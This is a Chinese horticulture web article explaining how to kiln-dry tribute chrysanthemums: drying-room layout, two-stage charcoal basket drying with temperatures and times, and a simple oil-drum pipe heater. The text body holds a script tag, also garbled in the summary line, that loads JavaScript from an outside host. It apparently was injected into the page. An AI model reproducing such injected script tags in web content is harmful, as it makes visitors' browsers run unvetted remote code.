您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

贡菊花烘焙干制技术

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=4164"/gt;贡菊花干制采用烘焙干制技术,烘焙好坏直接关系产品的质量。 1.烘房要求:烘房面积10平方米以上,烘房内不能通风,采用炭火烘笼烘焙的,烘房上部需设通风孔,以便排放水气。采用简易式管
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=4164"></Script>    贡菊花干制采用烘焙干制技术,烘焙好坏直接关系产品的质量。

    1.烘房要求:烘房面积10平方米以上,烘房内不能通风,采用炭火烘笼烘焙的,烘房上部需设通风孔,以便排放水气。采用简易式管道烘房烘焙的,燃烧室口、排烟道口应设在烘室外。

    2.烘笼烘干。炭火要用灰盖上,以不见明火为宜,温度要适宜,要严格遵循操作程序。具体做法:将采回来的鲜花上畚(花的多少以见不到空隙为宜),再放入烘房进行第一轮嫩畚烘焙(干花嫩畚烘需2.5~3小时。湿花需5.5~6小时),此时烘房内的温度40~50℃,炭火上层的温度约80℃。到达烘畚烘花的温度在53℃左右,土法测定是以手放在烘畚上不烫手为宜。烘制过程要经常检查火势和温度:温度过高,花会焙焦;温度过低,会导致菊花变色,从而降低质量,待烘至九成千时,转入第二轮老畚烘焙,这时温度可低于嫩畚火力的1/3(30~40℃),烘焙时间少于第一轮(约1.5小时)。到烘至象牙色花托绿色时,即将花取下烘畚,拿出烘房。放置于干燥通风处。这样烘焙出来的花色鲜而洁白,质量好价高。

    3.简易管道式烘干。用一只废铁桶作燃料箱。桶的一侧下方开一方形口子,紧贴烘房内墙壁,并对准烘房墙壁所留的进料口,用以在房外添加燃料。桶的另一侧上方,开一圆孔,连接一根弯曲的铁皮排气管道,排气管口通向烘房墙外(也可用砖砌一燃料口后连接铁皮管)。烘房墙上还有气孔,用以散发水汽,房内设有支架,可将多个花畚同时放在架上,烘焙时封闭烘房,及时添加柴火或无烟煤(烘房温度和时间控制同烘笼烘干)。

相关新闻